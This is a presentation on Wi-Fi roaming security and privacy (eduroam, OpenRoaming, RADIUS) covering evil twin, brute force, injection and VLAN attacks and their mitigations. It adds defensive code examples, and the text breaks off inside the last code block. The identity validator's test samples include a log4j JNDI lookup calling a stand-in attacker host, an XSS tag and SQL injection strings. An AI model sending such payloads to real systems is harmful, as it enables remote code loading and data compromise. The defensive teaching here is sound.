Wi-Fi roaming security and privacy
2023-02-23 Karri Huhtanen
Karri Huhtanen
● Installed first Linux distribution ~1993 (Softlanding Linux System, didn’t know how to exit emacs or vi)
● Have had Internet access since 1993 (but purchased first Internet subscription in 2006)
● Have worked with wireless networks, security and roaming since 1997
● Was there to connect Finland to eduroam in 2003 (maintained eduroam Finland top-level RADIUS since then)
● Founded Arch Red Oy (nowadays Radiator Software Oy) at Tampere University of Technology in 2003 with two colleagues to productise Wi-Fi access control and roaming solutions (e.g. roam.fi)
This may not be the Wi-Fi network security presentation you are looking for…
● This is a presentation about Wi-Fi roaming security and privacy => e.g. local Wi-Fi network security and radio protocols are covered only briefly
● If there is interest I can do a presentation about local Wi-Fi network security as well at some other time / event.
● On Slideshare I do have a presentation about that topic: https://www.slideshare.net/khuhtanen/security-issues-in-radius-based-wifi-aaa and more: https://www.slideshare.net/khuhtanen/presentations
● And I am looking for a replacement for Slideshare, because Scribd has reduced the usability of the service with forced advertisements etc.
So let’s start with Wi-Fi network security … :) with slides about Wi-Fi roaming basics as well
How does WPA2/3 Enterprise AAA work?
● The user device (supplicant) authenticates with EAP over 802.1X. The Network Access Server (NAS), e.g. a Wi-Fi controller or a Wi-Fi AP, does not authenticate the user itself: it carries the EAP messages to the RADIUS AAA server software inside the RADIUS protocol and acts on the accept/reject it gets back.
● User credentials (username+password, certificate, SIM card) travel within the encrypted EAP envelope, so the NAS and the RADIUS proxies in between never see them.
● EAP methods:
○ EAP-TLS: certificate based EAP method; certificate details can be seen on the wire (with TLS < 1.3 the client certificate is sent in the clear)
○ EAP-TTLS and EAP-PEAP: TLS secured “envelope” around an inner authentication method; the outer identity can be anonymous or the real identity, the inner identity and credentials are inside the tunnel
○ EAP-PWD: EAP method based on elliptic curves (password authenticated key exchange); the real identity is shown
○ EAP-SIM, EAP-AKA, EAP-AKA’: SIM card based EAP methods; support temporary identities etc.
So where does WPA2/3 Enterprise AAA fail?
● Very rarely with technology
● Sometimes with network and security design
● Often with misconfiguration or lack of configuration provisioning
● Most commonly with end users and manual device configuration
What is the difference between WPA2 and WPA3?
● WPA3 mandates Protected Management Frames (PMF); WPA2 has them as an option but by default does not mandate their use
● WPA3 has additional stronger encryption methods (e.g. the WPA3-Enterprise 192-bit mode) and, for personal networks, an improved key exchange (SAE instead of PSK)
● WPA2 will still be around and can be secured more by mandating PMF and disabling WPA1 and TKIP compatibility
How does Wi-Fi RADIUS roaming work?
Setting: Visited organisation (VO) Wi-Fi network with its NAS; roaming visitor’s device with outer identity anonymous@example.com and inner identity realusername@example.com.
1 Roaming visitor (anonymous@example.com) wants to join this Wi-Fi network.
2 NAS forwards the request to the VO RADIUS server. As example.com is not a VO realm, the RADIUS server proxies the request to its default server, the federation top level RADIUS server.
3 Federation top level RADIUS server knows that realm example.com is handled by the example.com RADIUS server and proxies the request to it.
4 Home organisation (example.com) RADIUS server and the example.com user device negotiate a TLS secured tunnel for authentication. Authentication happens end to end between the example.com user device and the example.com RADIUS server; the infrastructure in between only transports the EAP messages and sees the outer identity.
5 Home organisation RADIUS server makes the OK or NOT decision based on the authentication and returns the access decision response via the same infrastructure route.
6 NAS lets the example.com user device connect (or not) to the VO Wi-Fi network based on the proxied RADIUS response.
RADIUS based roaming federation
(Diagram of the roam.fi federation: Radiator Auth.Fi, Enterprise Wi-Fi as a service, and a redundant roam.fi RADIUS service in public cloud form the federation top level. Connected to it via RADIUS: Tampere University RADIUS, other customers connecting via RADIUS, e.g. City of Seinäjoki and Seinäjoki education, and the example.org and example.com RADIUS servers. roam.fi is the default RADIUS route for all roam.fi members, but has no own default RADIUS route.)
How does OpenRoaming work? (https://wballiance.com/openroaming/)
● The access network is a Passpoint (Hotspot 2.0) compatible Wi-Fi network. The SSID can be anything: the device selects the network by the Roaming Consortium Organisation Identifier (RCOI) it advertises, BA-A2-D0-xx-xx for Settled or 5A-03-BA-xx-xx for Settlement-Free access.
● The access network’s RADIUS capable Wi-Fi controller, or the organisation’s own RADIUS server (e.g. example.net’s), has a static RADIUS over TLS (RadSec, RFC 6614) connection to an OpenRoaming Settled or Settlement-Free Access Service Provider.
● Instead of a static proxy hierarchy, the Access Service Provider finds the user’s identity provider (IdP) with DNS discovery on the realm of the outer identity, using the global public DNS:
  NAPTR aaa+auth:radius.tls.tcp <realm>
  SRV <NAPTR result>
  Name lookup <SRV result>
● A dynamic RadSec connection is then opened directly to the IdP: to example.net’s IdP service provider for user@example.net, to the example.com IdP for user@example.com and user2@example.com, and to the example.org IdP for user@example.org. Trust between the parties comes from the certificates presented on the RadSec connections rather than from pre-shared RADIUS secrets.
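The NAPTR → SRV → name lookup chain above, written out as an added example (not code from the presentation or from any OpenRoaming implementation). DNS is reached through an injectable lookup function so the example runs offline against a constructed zone; the record contents, host names and addresses are assumptions for illustration, not real OpenRoaming records.

```python
"""RFC 7585 style dynamic discovery of a realm's RadSec server, the lookup
chain OpenRoaming uses (NAPTR -> SRV -> A/AAAA).

Added example, not code from the presentation or from any OpenRoaming
implementation. DNS is reached through an injectable lookup function so the
example runs offline against the constructed zone below; the record contents
are assumptions for illustration, not real OpenRoaming records.
"""
from dataclasses import dataclass

RADSEC_SERVICE = "aaa+auth:radius.tls.tcp"   # NAPTR service tag for RADIUS/TLS


@dataclass(frozen=True)
class Naptr:
    order: int
    preference: int
    flags: str
    service: str
    replacement: str


@dataclass(frozen=True)
class Srv:
    priority: int
    weight: int
    port: int
    target: str


# Constructed zone: example.com publishes a primary RadSec SRV set and a backup
# set, plus a DTLS entry that a RadSec (TLS over TCP) client must ignore.
FAKE_ZONE = {
    ("example.com", "NAPTR"): [
        Naptr(10, 50, "s", "aaa+auth:radius.tls.tcp", "_radiustls._tcp.example.com"),
        Naptr(10, 20, "s", "aaa+auth:radius.dtls.udp", "_radiusdtls._udp.example.com"),
        Naptr(20, 10, "s", "aaa+auth:radius.tls.tcp", "_radiustls-backup._tcp.example.com"),
    ],
    ("_radiustls._tcp.example.com", "SRV"): [
        Srv(10, 100, 2083, "idp1.example.com"),
        Srv(20, 100, 2083, "idp2.example.com"),
    ],
    ("_radiustls-backup._tcp.example.com", "SRV"): [
        Srv(10, 100, 2083, "idp3.example.com"),
    ],
    ("idp1.example.com", "A"): ["192.0.2.10"],
    ("idp2.example.com", "A"): ["192.0.2.11"],
    ("idp3.example.com", "A"): ["192.0.2.12"],
}


def fake_lookup(name, rtype):
    """Stand-in for a real resolver; returns [] for names that do not exist."""
    return FAKE_ZONE.get((name.lower(), rtype), [])


def realm_of(identity):
    """Realm of an NAI. Only the outer (possibly anonymous) identity is needed,
    so the access provider never learns the inner username."""
    if "@" not in identity:
        raise ValueError("identity has no realm, cannot be routed")
    return identity.rsplit("@", 1)[1].lower()


def discover_radsec_peers(realm, lookup=fake_lookup):
    """Return [(host, port, ip), ...] in the order a RadSec client should try."""
    candidates = [
        n for n in lookup(realm, "NAPTR")
        if n.service.lower() == RADSEC_SERVICE and "s" in n.flags.lower()
    ]
    peers = []
    # NAPTR: lowest order first, then lowest preference.
    for naptr in sorted(candidates, key=lambda n: (n.order, n.preference)):
        # SRV: lowest priority first. Among equal priorities RFC 2782 wants a
        # weighted random pick; highest weight first is used here to stay
        # deterministic.
        for srv in sorted(lookup(naptr.replacement, "SRV"),
                          key=lambda s: (s.priority, -s.weight)):
            for ip in lookup(srv.target, "A"):
                peers.append((srv.target, srv.port, ip))
    return peers


def discover_for_identity(identity, lookup=fake_lookup):
    return discover_radsec_peers(realm_of(identity), lookup)


if __name__ == "__main__":
    for peer in discover_for_identity("anonymous@example.com"):
        print("RadSec peer: %s:%d (%s)" % peer)
```

DNS alone proves nothing about the peer: the RadSec client must still validate the certificate the discovered server presents against the realm it is connecting for (RFC 7585 covers this), otherwise a spoofed NAPTR or SRV answer turns into a server side evil twin that terminates the user’s TLS tunnel.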
Wi-Fi Roaming Security
Evil Twin Man-in-the-Middle (MitM) attack
Setting: attacker sets up an Evil Twin Wi-Fi network with its own NAS and RADIUS server. Victim’s device has outer identity anonymous@example.com and inner identity realusername@example.com. The federation top level RADIUS server is never involved.
1) Evil twin sets up a Wi-Fi network with the same Wi-Fi network name (SSID) or Roaming Consortium Organisation Identifier (RCOI) as the real roaming network provider. Victim’s device tries automatically to join this network.
2) Victim’s device tries to negotiate the TLS connection (inside EAP, carried over RADIUS) with the home organisation RADIUS server, but the evil twin intercepts it and tries to impersonate the home organisation RADIUS server.
3) If the victim’s device does not have a proper Wi-Fi network configuration, or the capabilities, to check the RADIUS server certificate details, the device may send the credentials (username, password or password hash) to the attacker’s RADIUS server.
Federation RADIUS connectivity is not needed: the evil twin just needs to be able to terminate the TLS tunnel of the RADIUS authentication. There have also been accidental and ignorant evil twin RADIUS server configurations in organisations.
Evil Twin attack mitigation
● Proper Wi-Fi configuration profiles (eduroam-cat/geteduroam.app, Windows policies, Apple Configurator) instead of manual configuration by the user
● Using a private CA signed RADIUS server certificate instead of a well-known or system CA (Android) signed one => impersonation with another certificate signed by the same CA does not work (some devices cannot check the certificate CN or SubjectAltNames)
● Using client certificate authentication (EAP-TLS) or EAP-PWD => no credentials are sent, but the identity may still be sent
● Rogue access point detection and isolation features in Wi-Fi controllers
● Using separate network credentials (different username and password) or Multi-Factor Authentication => lost credentials are less valuable or do not work
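What a “proper configuration profile” has to contain can be checked mechanically. The following is an added example, not code from the presentation or from any provisioning tool: it audits wpa_supplicant.conf style network blocks (real wpa_supplicant option names) for the mitigations listed above. The two profiles, the CA path and the server name in them are constructed for illustration.

```python
"""Audits an 802.1X (WPA2/3 Enterprise) client profile for the evil twin
mitigations: trusted CA pinned, server name checked, anonymous outer
identity, PMF required.

Added example, not from the presentation. It reads wpa_supplicant.conf style
network blocks (real option names); the two profiles below are constructed
for illustration, and the CA path and server name in them are assumptions.
"""
import re

WEAK_PROFILE = """
network={
    ssid="eduroam"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="realusername@example.com"
    password="hunter2"
    phase2="auth=MSCHAPV2"
}
"""

HARDENED_PROFILE = """
network={
    ssid="eduroam"
    key_mgmt=WPA-EAP
    ieee80211w=2
    eap=PEAP
    anonymous_identity="anonymous@example.com"
    identity="realusername@example.com"
    password="hunter2"
    ca_cert="/etc/ssl/certs/example-com-radius-ca.pem"
    domain_match="radius.example.com"
    phase2="auth=MSCHAPV2"
}
"""

SERVER_NAME_OPTIONS = ("domain_match", "domain_suffix_match",
                       "altsubject_match", "subject_match")


def parse_network_block(text):
    """Return the key/value settings of the first network={...} block."""
    body = re.search(r"network=\{(.*?)\}", text, re.S)
    if not body:
        raise ValueError("no network block found")
    settings = {}
    for line in body.group(1).splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition("=")
        settings[key.strip()] = value.strip().strip('"')
    return settings


def realm(identity):
    return identity.rsplit("@", 1)[1].lower() if "@" in identity else ""


def audit_profile(settings):
    """Return a list of findings; an empty list means the profile passes."""
    findings = []
    if settings.get("key_mgmt") != "WPA-EAP":
        findings.append("key_mgmt is not WPA-EAP: not an 802.1X profile")
    if settings.get("eap", "").upper() in ("PEAP", "TTLS"):
        if "ca_cert" not in settings:
            findings.append("no ca_cert: any server certificate is accepted, "
                            "credentials can be sent to an evil twin")
        if not any(opt in settings for opt in SERVER_NAME_OPTIONS):
            findings.append("no server name check: any certificate from the "
                            "trusted CA is accepted")
        outer = settings.get("anonymous_identity")
        inner = settings.get("identity", "")
        if outer is None:
            findings.append("no anonymous_identity: real username is visible "
                            "to the visited network and every RADIUS hop")
        else:
            if outer.split("@")[0] == inner.split("@")[0]:
                findings.append("anonymous_identity reveals the real username")
            if realm(outer) != realm(inner):
                findings.append("outer and inner realm differ: the federation "
                                "routes on the outer realm, authentication "
                                "would go to the wrong home server")
    if settings.get("ieee80211w") != "2":
        findings.append("PMF not required (ieee80211w=2 missing)")
    return findings


if __name__ == "__main__":
    for name, profile in (("weak", WEAK_PROFILE), ("hardened", HARDENED_PROFILE)):
        print(name, audit_profile(parse_network_block(profile)) or ["OK"])
```

The weak profile is what a user typing settings by hand typically ends up with: it authenticates fine against the real server and just as happily against an evil twin. The same four properties are what eduroam CAT / geteduroam push to devices; the point of the slide is that they must be provisioned, not left to the user.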
Brute force / Denial of Service (DoS) attack
Setting: Visited organisation (VO) Wi-Fi network with its NAS; attacker’s device with outer identity anonymous@example.com, inner identity victim@example.com and a password guess as the password.
1) Attacker tries to brute force the victim’s password by using the visited organisation’s Wi-Fi network and the roaming infrastructure.
2) example.com RADIUS server tries to authenticate victim@example.com against its authentication backend (Active Directory, SQL, LDAP etc.).
3) example.com RADIUS server’s authentication backend responds to all requests, but may also lock the user account for a while or completely (DoS).
Roaming infrastructure and RADIUS servers do not usually have any rate limiting. The round trip time for a single roaming authentication is usually 1-5 seconds.
Brute force / Denial of Service (DoS) mitigation
● Rate limiting RADIUS requests in the home organisation RADIUS server
○ Can be complex to design, implement and configure depending on the EAP protocol and the inner EAP authentication method (with PEAP/EAP-TTLS the inner identity is only known once the TLS tunnel is up)
○ Can itself contribute to a Denial of Service attack if the limit is keyed on the victim’s identity
● Rate limiting requests in the home organisation authentication backend
○ Backends may not have support for rate limiting
○ Can itself contribute to a Denial of Service attack
● Rate limiting in the Wi-Fi network controller or Visited Organisation RADIUS server
○ Some support exists in the controllers for detecting devices failing multiple authentication requests
● Automatic locking and unlocking of the user account
● Rate limiting is rarely done because real attacks are equally rare
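The difference between a limit that stops the guessing and one that hands the attacker a DoS is what the limiter is keyed on. The following added example (not code from the presentation or from any RADIUS server) models only that decision logic; the NAS names, MAC addresses and passwords are constructed, and wiring it into a server’s pre-authentication policy is deployment specific.

```python
"""Failure rate limiting for a home organisation RADIUS server, keyed so that
a brute force attempt is throttled without turning into a lockout of the
victim's account.

Added example, not code from the presentation or from any RADIUS server. It
models only the decision logic (a real deployment hooks it into the server's
pre-authentication policy); NAS names, MACs and passwords below are
constructed.
"""
from collections import defaultdict, deque


class FailureLimiter:
    """Sliding window counter of failed authentications per key."""

    def __init__(self, max_failures, window_seconds):
        self.max_failures = max_failures
        self.window = window_seconds
        self.failures = defaultdict(deque)   # key -> timestamps of failures

    def _prune(self, key, now):
        queue = self.failures[key]
        while queue and now - queue[0] > self.window:
            queue.popleft()
        return queue

    def allowed(self, key, now):
        return len(self._prune(key, now)) < self.max_failures

    def record_failure(self, key, now):
        self._prune(key, now).append(now)


def key_by_source(req):
    """Throttle the device doing the guessing: the reporting NAS plus the
    client MAC it saw. The victim's own device at another NAS is unaffected."""
    return ("src", req["NAS-Identifier"], req["Calling-Station-Id"].lower())


def key_by_user(req):
    """Throttle the target account. Simple, but anyone who knows the username
    can keep the victim locked out: the DoS the slides warn about."""
    return ("user", req["inner_identity"].lower())


def simulate(limiter, key_fn, requests, verify):
    """Outcome per request: 'throttled', 'accept' or 'reject'."""
    outcomes = []
    for req in requests:
        key = key_fn(req)
        if not limiter.allowed(key, req["t"]):
            outcomes.append("throttled")      # rejected without touching the backend
            continue
        if verify(req):
            outcomes.append("accept")
        else:
            limiter.record_failure(key, req["t"])
            outcomes.append("reject")
    return outcomes


# Constructed backend: one account with a known password.
PASSWORDS = {"victim@example.com": "correct horse battery staple"}


def verify(req):
    return PASSWORDS.get(req["inner_identity"]) == req["password"]


def attack_then_victim():
    """Five guesses from the attacker's device at the VO, then the real user
    logging in at home one second after the last guess."""
    reqs = [{"t": i, "NAS-Identifier": "vo-ap-1",
             "Calling-Station-Id": "aa-bb-cc-00-00-01",
             "inner_identity": "victim@example.com", "password": "guess%d" % i}
            for i in range(5)]
    reqs.append({"t": 6, "NAS-Identifier": "home-ap-7",
                 "Calling-Station-Id": "aa-bb-cc-00-00-99",
                 "inner_identity": "victim@example.com",
                 "password": PASSWORDS["victim@example.com"]})
    return reqs


def outcomes(key_fn):
    limiter = FailureLimiter(max_failures=3, window_seconds=60)
    return simulate(limiter, key_fn, attack_then_victim(), verify)


if __name__ == "__main__":
    print("per source:", outcomes(key_by_source))
    print("per user:  ", outcomes(key_by_user))
```

Calling-Station-Id is whatever the NAS reports, so a per-source key throttles a device rather than a person and does not stop an attacker with many devices; it does remove the cheap single-device loop and, unlike the per-user key, never locks the victim out. In a roaming setup the home server sees the VO’s NAS attributes only as proxied, so the key should be validated before being trusted.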
Injection attack
Setting: Visited organisation (VO) Wi-Fi network with its NAS; attacker’s device with outer identity <exploit>@victim.domain, inner identity <exploit>@victim.domain or <exploit>, and password <exploit>.
1) Attacker inserts the exploit payload (log4j, SQL, JavaScript, XSS, HTML …) into the outer or inner identity or the password instead of the credentials.
2) Any device, RADIUS server, centralised log system, web based user interface etc. along the roaming path which processes or displays the outer identity is exposed to the exploit.
3) victim.domain systems processing the outer/inner identity and the password are exposed to the exploit.
Injection attack comments and mitigation
Comments
● There have not yet been successful public cases or occurrences of this attack
● In eduroam this was tested when the log4j exploit was published, but just placing the log4j exploit in the RADIUS request did not work
● Maximum length of a RADIUS attribute value is 253 octets, which limits the size of an exploit carried in a single attribute
Mitigation
● Sanitising inputs in the software that stores, processes or displays the identities (logs, databases, web UIs)
● Sanitising User-Name (outer identity), inner identity and password in RADIUS servers
○ Done sometimes, for example for whitespace in User-Name
○ Done also sometimes for specific characters, but extra care needs to be taken to not break legitimate requests
○ Only the home organisation is exposed to an exploit placed in the inner identity or the password; every hop sees the outer identity
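A syntax check on the identity is the usual first line of that sanitising, and the NAI grammar (RFC 7542) gives a defensible rule for what to reject without breaking legitimate users. The block below is an added example, not code from the presentation or from any RADIUS server’s configuration; the payloads in it are constructed test input.

```python
"""Syntax check of identities (User-Name, inner identity) before they reach
logs, databases and web UIs, following the NAI grammar of RFC 7542.

Added example, not from the presentation or from any RADIUS server's
configuration. The payloads below are constructed and are used only as test
input for the check.
"""
import unicodedata
import re

# RFC 7542 "atext" characters allowed in the username part (plus "." between
# atoms). Note that $ { } ' = are all legal, so a syntax check is not a
# substitute for parameterised queries and log/HTML escaping downstream.
USERNAME_ATEXT = set(
    "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    "!#$%&'*+-/=?^_`{|}~"
)
REALM_LABEL_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?$")
MAX_ATTR_VALUE_OCTETS = 253      # RADIUS attribute value limit, RFC 2865


def check_nai(name):
    """Return (accepted, reason). Accepts only well formed user@realm NAIs."""
    if not name:
        return False, "empty"
    if len(name.encode("utf-8")) > MAX_ATTR_VALUE_OCTETS:
        return False, "longer than one RADIUS attribute value"
    for ch in name:
        if ch.isspace() or unicodedata.category(ch).startswith("C"):
            return False, "whitespace or control character"
    user, at, realm = name.rpartition("@")
    if not at:
        return False, "no realm: cannot be routed in a roaming federation"
    if not realm or not all(REALM_LABEL_RE.match(label) for label in realm.split(".")):
        return False, "malformed realm"
    if not user or user.startswith(".") or user.endswith(".") or ".." in user:
        return False, "malformed username"
    for ch in user:
        if ch != "." and ord(ch) < 128 and ch not in USERNAME_ATEXT:
            return False, "character %r not allowed in username" % ch
    return True, "ok"


# Constructed inputs: legitimate identities from the slides and injection
# style payloads in the shape the attack description above uses.
SAMPLES = [
    "anonymous@example.com",
    "realusername@example.com",
    "0001012014020013@wlan.mnc001.mcc001.3gppnetwork.org",
    "${jndi:ldap://attacker.test/a}@victim.domain",
    "<script>alert(1)</script>@victim.domain",
    "' OR 1=1 --@victim.domain",
    "'OR'1'='1@victim.domain",
    "user@example.com ",
    "a" * 250 + "@b.c",
]


def audit_samples(samples=SAMPLES):
    return {s: check_nai(s) for s in samples}


if __name__ == "__main__":
    for s, (ok, why) in audit_samples().items():
        print("%-55r %s (%s)" % (s, "accept" if ok else "reject", why))
```

The last accepted sample is the important one: `'OR'1'='1@victim.domain` is a perfectly legal NAI. Sanitising in the RADIUS server removes the obvious junk (whitespace, control characters, `<`, `:`), but the systems that store and display identities still need parameterised queries and output escaping of their own.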
VLAN penetration attack
Setting: Visited organisation (VO) Wi-Fi network with its NAS; attacker’s device with outer identity anonymous@attacker.com, inner identity realusername@attacker.com and the real password, authenticated by an attacker controlled RADIUS server for the realm attacker.com.
1) Attacker authenticates to the Visited Organisation Wi-Fi network using roaming credentials from the attacker controlled RADIUS server.
2) Attacker’s RADIUS server accepts the attacker’s authentication and includes in its Access-Accept response VLAN assignment attributes targeted at the VO’s Wi-Fi equipment.
3) If the VO RADIUS server does not strip VLAN assignment attributes from responses coming from the roaming federation, the attributes are passed to the Wi-Fi network equipment as they are.
4) If the VO uses VLAN assignment in its Wi-Fi network, the Wi-Fi network equipment drops the attacker’s device into the VLAN defined by the attacker’s RADIUS server.
Roaming federation servers often clean at least the standard VLAN assignment attributes (Tunnel-Type, Tunnel-Medium-Type, Tunnel-Private-Group-ID) from proxied responses, but mostly pass all other RADIUS attributes through, vendor specific ones included.
VLAN penetration attack mitigation
● Strip standard and vendor specific VLAN assignment RADIUS attributes in the own organisation RADIUS server from responses proxied in from the federation
● Strip attributes in the other federation RADIUS servers as well, but do not rely on it
● Take care what organisations can join the roaming federation and in identifying them
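Stripping works as an allowlist or a denylist, and the slides’ point about vendor specific attributes is exactly where a denylist fails. The following added example (not code from the presentation or any RADIUS server’s configuration) shows both on a constructed Access-Accept; the attribute names are standard RADIUS and Aruba VSA names as seen on the accounting dumps later in the deck.

```python
"""Filtering the Access-Accept that comes back through the roaming federation
before the VO's own RADIUS server hands it to the Wi-Fi equipment.

Added example, not from the presentation or any RADIUS server's config; the
attribute names are standard RADIUS and Aruba VSA names as seen on the
slides, the reply itself is constructed.
"""

# RFC 2868 tunnel attributes that carry dynamic VLAN assignment.
STANDARD_VLAN_ATTRS = {"Tunnel-Type", "Tunnel-Medium-Type", "Tunnel-Private-Group-ID"}

# What a VO needs from a foreign home server for the session to work: the
# keying material, the EAP success and a few bookkeeping attributes. Anything
# else is an instruction to our equipment and must come from our own policy.
REPLY_ALLOWLIST = {
    "MS-MPPE-Recv-Key", "MS-MPPE-Send-Key",      # PMK halves, mandatory for 802.1X
    "EAP-Message", "Message-Authenticator",      # EAP-Success relayed to the NAS
    "User-Name", "Class", "State", "Proxy-State",
    "Session-Timeout", "Chargeable-User-Identity",
}

# Constructed Access-Accept from the attacker controlled attacker.com server.
ATTACKER_REPLY = [
    ("User-Name", "anonymous@attacker.com"),
    ("EAP-Message", b"\x03\x0b\x00\x04"),          # EAP-Success, id 11
    ("MS-MPPE-Recv-Key", b"<key material>"),
    ("MS-MPPE-Send-Key", b"<key material>"),
    ("Tunnel-Type", "VLAN"),
    ("Tunnel-Medium-Type", "IEEE-802"),
    ("Tunnel-Private-Group-ID", "10"),             # e.g. the VO management VLAN
    ("Aruba-User-Vlan", 10),                       # vendor specific way to say the same
    ("Aruba-User-Role", "admin"),                  # vendor specific role, also dangerous
    ("Session-Timeout", 3600),
]


def strip_standard_vlan(reply):
    """Denylist approach: removes the RFC 2868 attributes only."""
    return [(name, value) for name, value in reply if name not in STANDARD_VLAN_ATTRS]


def keep_allowlisted(reply, allow=REPLY_ALLOWLIST):
    """Allowlist approach: keeps only what the session needs."""
    return [(name, value) for name, value in reply if name in allow]


def names(reply):
    return [name for name, _ in reply]


if __name__ == "__main__":
    print("denylist leaves:", names(strip_standard_vlan(ATTACKER_REPLY)))
    print("allowlist leaves:", names(keep_allowlisted(ATTACKER_REPLY)))
```

Apply the allowlist only to responses that arrive from the federation; the VO’s own users may legitimately get VLAN and role attributes from the VO’s own server. If the VO wants visitors in a guest VLAN, that assignment is added locally after the filter, never taken from the reply.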
Wi-Fi Roaming Privacy
(Meme slide: “MAC address tracking your device”. You may have seen this on the Internet. It’s funny because it’s true, at least with the adjustments on the following slides.)
MAC addresses, we all got them...
● Most of the network interfaces on your device have a unique address called a MAC address
● Wi-Fi and Bluetooth interfaces may “broadcast” the address even if the interface is not in active use
MAC addresses are used ...
● to identify devices and users
● to control access to the network
● to limit use of network resources
● to keep track of sessions
● to assign and track IP addresses
● to track devices => to track persons
Wi-Fi devices send so called probe requests to find out what Wi-Fi networks are available, and they may do this even if Wi-Fi is turned off. Bluetooth devices respond to queries and may do their own probing as well. This makes it possible to track for example people and their movements in shopping malls => a nice tracking business.
(Diagram: tracking results built from sniffed MAC addresses: “7 people hanging near a certain store”, “a person’s path”, “recurring visitor”.)
MAC address randomisation
● was first done only in the probe requests
● has been extended to network connections
● is currently per Wi-Fi network (profile)
● is expected in the future to be time-based as well
● is enabled by default in Android 10, 11 and iOS/iPadOS 14+
Check also the globalreachtech.com WWW pages for more analysis of MAC address randomisation by Dr Chris Spencer.
Randomised MAC address does not stop tracking
● In most devices the randomised MAC address only changes when a network or profile is deleted and created again => recurring visitors can be identified at least within the same network
● In authenticated and roaming networks the MAC address does not really matter: User-Name and Chargeable-User-Identity can be used for tracking if these are not protected
● User-Name and Chargeable-User-Identity are sent in clear text with
○ EAP-TLS with TLS < 1.3 (the client certificate, subject included, is sent in the clear)
○ PEAP/EAP-TTLS (the outer identity is visible to the visited network and every RADIUS hop)
○ EAP-SIM / EAP-AKA / EAP-AKA’ without IMSI Privacy
● While the EAP TLS tunnel protects the credentials and the inner identity during authentication, the RADIUS attributes around it and the whole RADIUS accounting exchange are sent in clear text unless RadSec is used
EAP-SIM/EAP-AKA/EAP-AKA’ privacy
EAP-SIM, EAP-AKA and EAP-AKA’ are SIM based Wi-Fi authentication methods used to achieve seamless offloading to carrier and partner Wi-Fi. The International Mobile Subscriber Identity (IMSI) derived from the SIM card is the unique identifier for each user.
On the first connection to a Wi-Fi network the mobile device communicates its permanent subscriber identity (IMSI), which is then sent to the home operator for authentication. Without IMSI Privacy features this identity is sent in the clear, both over the air in the EAP identity response and in the User-Name of the RADIUS requests.
A third party adversary installing a Wi-Fi sniffer in the vicinity of such networks can harvest permanent identities and track users. This tracking can also be done by the venue or network owner, and by any RADIUS proxy on the roaming path, when the device connects to the Wi-Fi network.
(Image: warning shown by iOS when joining Wi-Fi without IMSI privacy in place.)
RADIUS Accounting Start message
e86bff00 Thu Feb 23 14:50:10 2023 594131: DEBUG: Packet dump:
e86bff00 *** Received from 10.255.255.245 port 61503 ....
e86bff00 Code: Accounting-Request
e86bff00 Identifier: 1
e86bff00 Authentic: <167>[<8>i+<250><208><242><12>A<179><226>d<183><183>S
e86bff00 Attributes:
e86bff00 Acct-Status-Type = Start
e86bff00 NAS-IP-Address = 10.255.255.245
e86bff00 User-Name = "0001012014020013@wlan.mnc001.mcc001.3gppnetwork.org"
e86bff00 NAS-Port = 0
e86bff00 NAS-Port-Type = Wireless-IEEE-802-11
e86bff00 Calling-Station-Id = "aa2b0b553528"
e86bff00 Called-Station-Id = "6026efcdcdc4"
e86bff00 Framed-IP-Address = 172.16.145.111
e86bff00 Acct-Multi-Session-Id = "AA2B0B553528-1677156607"
e86bff00 Acct-Session-Id = "6026EF5CDC55-AA2B0B553528-63F76102-8F448"
e86bff00 Acct-Delay-Time = 0
e86bff00 Aruba-Essid-Name = "RS-TEST"
e86bff00 Aruba-Location-Id = "rs-aruba-ap-1"
e86bff00 Aruba-User-Vlan = 145
e86bff00 Aruba-User-Role = "RS-TEST"
e86bff00 Aruba-Device-Type = "NOFP"
e86bff00 Acct-Authentic = RADIUS
e86bff00 Service-Type = Login-User
e86bff00 NAS-Identifier = "rs-aruba-ap-1"
e86bff00
Note the IMSI in the User-Name, the MAC addresses, IP addresses, Session-Ids and the Aruba vendor specific RADIUS attributes.
RADIUS Accounting Stop message
d5b39070 Thu Feb 23 14:53:52 2023 182291: DEBUG: Packet dump:
d5b39070 *** Received from 10.255.255.245 port 61503 ....
d5b39070 Code: Accounting-Request
d5b39070 Identifier: 1
d5b39070 Authentic: <188>9>g[<186><157>U|`<244><143>"<171><183><127>
d5b39070 Attributes:
d5b39070 Acct-Status-Type = Stop
d5b39070 NAS-IP-Address = 10.255.255.245
d5b39070 User-Name = "0001012014020013@wlan.mnc001.mcc001.3gppnetwork.org"
d5b39070 NAS-Port = 0
d5b39070 NAS-Port-Type = Wireless-IEEE-802-11
d5b39070 Calling-Station-Id = "aa2b0b553528"
d5b39070 Called-Station-Id = "6026efcdcdc4"
d5b39070 Framed-IP-Address = 172.16.145.111
d5b39070 Acct-Multi-Session-Id = "AA2B0B553528-1677156607"
d5b39070 Acct-Session-Id = "6026EF5CDC55-AA2B0B553528-63F76102-8F448"
d5b39070 Acct-Delay-Time = 0
d5b39070 Aruba-Essid-Name = "RS-TEST"
d5b39070 Aruba-Location-Id = "rs-aruba-ap-1"
d5b39070 Aruba-User-Vlan = 145
d5b39070 Aruba-User-Role = "RS-TEST"
d5b39070 Aruba-Device-Type = "NOFP"
d5b39070 Acct-Input-Octets = 35954
d5b39070 Acct-Output-Octets = 855517
d5b39070 Acct-Input-Packets = 549
d5b39070 Acct-Output-Packets = 453
d5b39070 Acct-Input-Gigawords = 0
Note also the one Location attribute (Aruba-Location-Id). There are a lot more related attributes in the standardisation process, and under development is also a technology called Wi-Fi sensing, which probably also brings new attributes to RADIUS requests.
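Reading an accounting request for identifiers can be automated; the following is an added example, not code from the presentation, that parses Radiator style “Attribute = value” lines. The sample is reduced from the attributes shown in the dumps above (the IMSI is the slides’ test value), and two things the code checks are worth knowing: a 3GPP permanent identity carries a leading digit that tells which EAP method is in use, and the locally administered bit of the client MAC tells whether the device randomised it.

```python
"""Picks out the identifiers in a RADIUS accounting request such as the
Accounting-Start dump above.

Added example, not from the presentation. It parses Radiator style
"Attribute = value" lines; the sample is reduced from the attributes shown on
the slides and the IMSI in it is the slides' test value.
"""
import re

SAMPLE_ACCT_START = """\
Acct-Status-Type = Start
NAS-IP-Address = 10.255.255.245
User-Name = "0001012014020013@wlan.mnc001.mcc001.3gppnetwork.org"
NAS-Port-Type = Wireless-IEEE-802-11
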